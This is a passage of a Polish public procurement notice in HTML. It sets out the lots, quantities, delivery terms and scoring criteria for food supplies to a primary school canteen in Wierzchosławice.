</p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15510000-6 - Mleko i śmietana</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15530000-2 - Masło</p> <p class="mb-0">15540000-5 - Produkty serowarskie</p> <p class="mb-0">15551000-5 - Jogurt i pozostałe przefermentowane przetwory mleczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznawane za ww. kryteria będą liczone następująco:<br/>a)	cena oferty brutto - 60% - max do 60 pkt.<br/> Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/> gdzie:<br/> - Cmin - najniższa cena spośród wszystkich ofert<br/> - Cof - cena podana w ofercie<br/> - waga procentowa dla kryterium „cena oferty brutto = 60%<br/><br/>b)	czas rozpatrzenia reklamacji - 40% - max do 40 pkt. <br/>Czas rozpatrzenia reklamacji przedmiotu umowy posiadającego wady i wymiany go na wolny od wad. Zgłoszenia dotyczące reklamacji dokonywane będą drogą telefoniczną, a następnie potwierdzane e-mailem. W czas rozpatrzenia reklamacji nie wlicza się sobót i dni ustawowo wolnych od pracy. Czas rozpatrzenia reklamacji nie może być dłuższy niż 72 godziny. Opis przyznawania punktów zawiera tabela:<br/>Lp.	Czas rozpatrzenia reklamacji	pkt<br/>1.	do 2 godzin	40<br/>2.	do 6 godzin	30<br/>3.	do 24 godzin	20<br/>4.	do 48 godzin	10<br/>5.	powyżej 48 godzin	0<br/><br/>Po dokonaniu oceny punkty zostaną zsumowane dla każdego z kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa mięsa wieprzowego i drobiowego do stołówki szkolnej Szkoły Podstawowej im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Kark wp b/k kl.1	kg	150<br/>2. Łopatka b/k	kg	80<br/>3. Polędwiczka wieprzowa	kg	400<br/>4. Schab wp b/k	kg	350<br/>5. Słonina bez skóry	kg	20<br/>6. Szynka surowa wp z/k bez skóry i biodrówki kl. 1	kg	600<br/>7. Żeberka wp paski, trójkąty	kg	230<br/>8. Filet z indyka b/s i b/k	kg	400<br/>9. Filet z kurczaka b/s i b/k	kg	520<br/>10. Kurczak świeży	kg	350<br/>11. Porcja rosołowa	kg	650<br/>12. Udko z kurczaka	kg	400<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 6.00÷9.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznawane za ww. kryteria będą liczone następująco:<br/>a)	cena oferty brutto - 60% - max do 60 pkt.<br/> Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/> gdzie:<br/> - Cmin - najniższa cena spośród wszystkich ofert<br/> - Cof - cena podana w ofercie<br/> - waga procentowa dla kryterium „cena oferty brutto = 60%<br/><br/>b)	czas rozpatrzenia reklamacji - 40% - max do 40 pkt. <br/>Czas rozpatrzenia reklamacji przedmiotu umowy posiadającego wady i wymiany go na wolny od wad. Zgłoszenia dotyczące reklamacji dokonywane będą drogą telefoniczną, a następnie potwierdzane e-mailem. W czas rozpatrzenia reklamacji nie wlicza się sobót i dni ustawowo wolnych od pracy. Czas rozpatrzenia reklamacji nie może być dłuższy niż 72 godziny. Opis przyznawania punktów zawiera tabela:<br/>Lp.	Czas rozpatrzenia reklamacji	pkt<br/>1.	do 2 godzin	40<br/>2.	do 6 godzin	30<br/>3.	do 24 godzin	20<br/>4.	do 48 godzin	10<br/>5.	powyżej 48 godzin	0<br/><br/>Po dokonaniu oceny punkty zostaną zsumowane dla każdego z kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa mięsa wołowego do stołówki szkolnej Szkoły Podstawowej im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Rostbef wołowy b/k kl.1 kg	60<br/>2. Szponder wołowy b/k	kg	60<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 6.00÷9.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznawane za ww. kryteria będą liczone następująco:<br/>a)	cena oferty brutto - 60% - max do 60 pkt.<br/> Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/> gdzie:<br/> - Cmin - najniższa cena spośród wszystkich ofert<br/> - Cof - cena podana w ofercie<br/> - waga procentowa dla kryterium „cena oferty brutto = 60%<br/><br/>b)	czas rozpatrzenia reklamacji - 40% - max do 40 pkt. <br/>Czas rozpatrzenia reklamacji przedmiotu umowy posiadającego wady i wymiany go na wolny od wad. Zgłoszenia dotyczące reklamacji dokonywane będą drogą telefoniczną, a następnie potwierdzane e-mailem. W czas rozpatrzenia reklamacji nie wlicza się sobót i dni ustawowo wolnych od pracy. Czas rozpatrzenia reklamacji nie może być dłuższy niż 72 godziny. Opis przyznawania punktów zawiera tabela:<br/>Lp.	Czas rozpatrzenia reklamacji	pkt<br/>1.	do 2 godzin	40<br/>2.	do 6 godzin	30<br/>3.	do 24 godzin	20<br/>4.	do 48 godzin	10<br/>5.	powyżej 48 godzin	0<br/><br/>Po dokonaniu oceny punkty zostaną zsumowane dla każdego z kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa wędlin wieprzowych i drobiowych do stołówki szkolnej Szkoły Podstawowej im. 100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Kiełbasa wiejska kg	60<br/>2. Kiełbasa zwyczajna kg	60<br/>3. Kiełbasa żywiecka	kg	60<br/>4. Parówki z Bobrownik Nik-Pol op. 5szt	szt	160<br/>5. Parówki z szynki JBB op. 5szt szt	160<br/>6. Podgardle wędzone kg	50<br/>7. Schab z Lubinki	kg	70<br/>8. Sopocka tradycyjna kg	60<br/>9. Szynka z Lubinki	kg	70<br/>10. Indyk z Bobrownik kg	70<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 6.00÷9.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15130000-8 - Produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznawane za ww. kryteria będą liczone następująco:<br/>a)	cena oferty brutto - 60% - max do 60 pkt.<br/> Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/> gdzie:<br/> - Cmin - najniższa cena spośród wszystkich ofert<br/> - Cof - cena podana w ofercie<br/> - waga procentowa dla kryterium „cena oferty brutto = 60%<br/><br/>b)	czas rozpatrzenia reklamacji - 40% - max do 40 pkt. <br/>Czas rozpatrzenia reklamacji przedmiotu umowy posiadającego wady i wymiany go na wolny od wad. Zgłoszenia dotyczące reklamacji dokonywane będą drogą telefoniczną, a następnie potwierdzane e-mailem. W czas rozpatrzenia reklamacji nie wlicza się sobót i dni ustawowo wolnych od pracy. Czas rozpatrzenia reklamacji nie może być dłuższy niż 72 godziny. Opis przyznawania punktów zawiera tabela:<br/>Lp.	Czas rozpatrzenia reklamacji	pkt<br/>1.	do 2 godzin	40<br/>2.	do 6 godzin	30<br/>3.	do 24 godzin	20<br/>4.	do 48 godzin	10<br/>5.	powyżej 48 godzin	0<br/><br/>Po dokonaniu oceny punkty zostaną zsumowane dla każdego z kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa pieczywa do stołówki szkolnej Szkoły Podstawowej im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Bagietka 30cm	szt.	300<br/>2. Bułka – kajzerka / mała	szt.	400<br/>3. Bułka grahamka	szt.	300<br/>4. Bułka maślana	szt.	350<br/>5. Bułka tarta	kg	100<br/>6. Bułka wieloziarnista	kg	200<br/>7. Bułka zwykła	szt.	300<br/>8. Chałka	szt.	160<br/>9. Chleb graham	szt.	300<br/>10. Chleb jęczmienny	szt.	200<br/>11. Chleb pszenno-żytni	szt.	400<br/>12. Chleb słonecznikowy	szt.	300<br/>13. Chleb wieloziarnisty	szt.	200<br/>14. Chleb żytni	szt.	200<br/>15. Ciasto drożdżowe	kg	120<br/>16. Drożdże	kg	10<br/>17. Rogalik maślany	szt.	350<br/>18. Szarlotka kg	100<br/>19. Wek	szt.	1000<br/><br/>Gotowość realizacji dostaw: codziennie (w dni robocze) w godz. 6.00 ÷ 7.30 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15898000-9 - Drożdże</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznawane za ww. kryteria będą liczone następująco:<br/>a)	cena oferty brutto - 60% - max do 60 pkt.<br/> Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/> gdzie:<br/> - Cmin - najniższa cena spośród wszystkich ofert<br/> - Cof - cena podana w ofercie<br/> - waga procentowa dla kryterium „cena oferty brutto = 60%<br/><br/>b)	czas rozpatrzenia reklamacji - 40% - max do 40 pkt. <br/>Czas rozpatrzenia reklamacji przedmiotu umowy posiadającego wady i wymiany go na wolny od wad. Zgłoszenia dotyczące reklamacji dokonywane będą drogą telefoniczną, a następnie potwierdzane e-mailem. W czas rozpatrzenia reklamacji nie wlicza się sobót i dni ustawowo wolnych od pracy. Czas rozpatrzenia reklamacji nie może być dłuższy niż 72 godziny. Opis przyznawania punktów zawiera tabela:<br/>Lp.	Czas rozpatrzenia reklamacji	pkt<br/>1.	do 2 godzin	40<br/>2.	do 6 godzin	30<br/>3.	do 24 godzin	20<br/>4.	do 48 godzin	10<br/>5.	powyżej 48 godzin	0<br/><br/>Po dokonaniu oceny punkty zostaną zsumowane dla każdego z kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa pozostałych artykułów spożywczych do stołówki szkolnej Szkoły Podstawowej im. 100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Ananasy w syropie	szt.	40<br/>2. Bazylia 200g	szt.	5<br/>3. Brzoskwinie w syropie	szt.	100<br/>4. Chrupki kukurydziane	szt.	250<br/>5. Chrzan tarty	szt.	80<br/>6. Ciastka bezglutenowe	szt.	15<br/>7. Cukier kryształ	kg	500<br/>8. Cukier puder	szt.	100<br/>9. Curry	szt.	30<br/>10. Cynamon 800g	szt.	3<br/>11. Czekolada	szt.	100<br/>12. Czosnek granulowany 1kg	szt.	2<br/>13. Dżem niskosłodzony 280g	szt.	60<br/>14. Dżem niskosłodzony 840g	szt.	60<br/>15. Ekstrakt naturalny wanilia 30 ml	szt.	30<br/>16. Fasola biała i czerwona w puszce	szt.	30<br/>17. Galaretka owocowa	szt.	110<br/>18. Gałka muszkatołowa	szt.	10<br/>19. Groszek ptysiowy 125g	szt.	480<br/>20. Groszek zielony konserwowy	szt.	100<br/>21. Herbata expressowa	szt.	30<br/>22. Herbata owocowa	szt.	500<br/>23. Herbatniki pełnoziarniste min. 250g	szt.	250<br/>24. Jaja świeże rozmiar L	szt.	7000<br/>25. Imbir	szt.	20<br/>26. Kakao naturalne 150g	szt.	80<br/>27. Kasza gryczana	kg	10<br/>28. Kasza jaglana	kg	40<br/>29. Kasza jęczmienna	kg	100<br/>30. Kasza kukurydziana	kg	6<br/>31. Kasza kuskus	kg	50<br/>32. Kasza manna	kg	90<br/>33. Kasza pęczak	kg	50<br/>34. Kawa zbożowa, bezkofeinowa	szt.	80<br/>35. Ketchup 480g	szt.	80<br/>36. Kminek cały	szt.	30<br/>37. Kminek mielony 400g	szt.	4<br/>38. Koncentrat pomidorowy 950g	szt.	120<br/>39. Kukurydza konserwowa	szt.	130<br/>40. Liść laurowy 100g	szt.	5<br/>41. Majeranek suszony 200g	szt.	6<br/>42. Majonez	szt.	70<br/>43. Makaron bezglutenowy różne kształty	szt.	30<br/>44. Makaron różne kształty	kg	650<br/>45. Makaron różne kształty razowy	kg	60<br/>46. Masa krówkowa/kajmak	szt.	20<br/>47. Mąka bezglutenowa	kg	7<br/>48. Mąka pszenna	kg	450<br/>49. Mąka ziemniaczana	kg	25<br/>50. Miód 1400g	szt.	20<br/>51. Mleczko kokosowe	szt.	30<br/>52. Morele suszone	szt.	50<br/>53. Mus owocowy/warzywny/z dodatkiem płatków zb.	szt.	3000<br/>54. Musztarda	szt.	40<br/>55. Napój owsiany/migdałowy 1l	szt.	200<br/>56. Ocet	szt.	20<br/>57. Ogórki konserwowe 1700ml	szt.	50<br/>58. Olej roślinny	litry	400<br/>59. Olej roślinny z ziołami i warzywami	szt.	30<br/>60. Oliwa z oliwek 1 l	szt.	20<br/>61. Oliwki zielone i czarna 0,9l - cała / krojona	szt.	20<br/>62. Oregano 200g	szt.	6<br/>63. Orzechy - laskowe, włoskie	kg	4<br/>64. Panierka Panko 1kg	szt.	20<br/>65. Papryka czerwona słodka wędzona 1kg	szt.	6<br/>66. Papryka słodka mielona czerwona 1kg	szt.	10<br/>67. Pasta pesto 190g	szt.	60<br/>68. Pieczywo bezglutenowe	szt.	20<br/>69. Pieprz cytrynowy 20g	szt.	60<br/>70. Pieprz czarny mielony1kg	kg	6<br/>71. Pieprz ziołowy 20g	szt.	60<br/>72. Płatki czekoladowe i kukurydziane	szt.	250<br/>73. Płatki migdałowe 50g	szt.	120<br/>74. Płatki zbożowe	szt.	170<br/>75. Podpłomyk bez cukru	szt.	140<br/>76. Pomidory krojone bez skórki 2500ml	szt.	80<br/>77. Pomidory suszone 250g - słoik	szt.	30<br/>78. Powidło śliwkowe	szt.	100<br/>79. Przyprawa uniwersalna 150g	szt.	400<br/>80. Rodzynki 1kg	szt.	9<br/>81. Ryż basmati bez glutenu 1kg	szt.	150<br/>82. Ryż biały długoziarnisty, brązowy	kg	150<br/>83. Ryż biały paraboliczny, basmati	kg	130<br/>84. Sałatka z czerwonej kapusty	szt.	200<br/>85. Seler konserwowy 0,9l	szt.	20<br/>86. Sezam 100g	szt.	60<br/>87. Słonecznik łuskany	kg	15<br/>88. Soczek w kartoniku/butelce 200-300ml	szt.	1200<br/>89. Sól kamienna jodowana	kg	200<br/>90. Śliwka kalifornijska	kg	5<br/>91. Tymianek 10g	szt.	80<br/>92. Wafle ryżowe	szt.	50<br/>93. Wafle tortowe niskocukrowe	szt.	50<br/>94. Wiórki kokosowe 100g	szt.	30<br/>95. Woda mineralna	szt.	1300<br/>96. Ziele angielskie 15g	szt.	30<br/>97. Zioła prowansalskie	szt.	30<br/>98. Żurawina 2kg	szt.	18<br/>99. Żurek na wodzie źródlanej	szt.	170<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 7.00 ÷ 10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15330000-0 - Przetworzone owoce i warzywa</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15830000-5 - Cukier i produkty pokrewne</p> <p class="mb-0">15860000-4 - Kawa, herbata i podobne produkty</p> <p class="mb-0">15840000-8 - Kakao; czekolada i wyroby cukiernicze</p> <p class="mb-0">15410000-5 - Surowe oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15610000-7 - Produkty przemiału ziarna</p> <p class="mb-0">15851100-9 - Makaron niegotowany</p> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznawane za ww. kryteria będą liczone następująco:<br/>a)	cena oferty brutto - 60% - max do 60 pkt.<br/> Liczba punktów = ( Cmin/Cof ) * 100 * waga<br/> gdzie:<br/> - Cmin - najniższa cena spośród wszystkich ofert<br/> - Cof - cena podana w ofercie<br/> - waga procentowa dla kryterium „cena oferty brutto = 60%<br/><br/>b)	czas rozpatrzenia reklamacji - 40% - max do 40 pkt. <br/>Czas rozpatrzenia reklamacji przedmiotu umowy posiadającego wady i wymiany go na wolny od wad. Zgłoszenia dotyczące reklamacji dokonywane będą drogą telefoniczną, a następnie potwierdzane e-mailem. W czas rozpatrzenia reklamacji nie wlicza się sobót i dni ustawowo wolnych od pracy. Czas rozpatrzenia reklamacji nie może być dłuższy niż 72 godziny. Opis przyznawania punktów zawiera tabela:<br/>Lp.	Czas rozpatrzenia reklamacji	pkt<br/>1.	do 2 godzin	40<br/>2.	do 6 godzin	30<br/>3.	do 24 godzin	20<br/>4.	do 48 godzin	10<br/>5.	powyżej 48 godzin	0<br/><br/>Po dokonaniu oceny punkty zostaną zsumowane dla każdego z kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 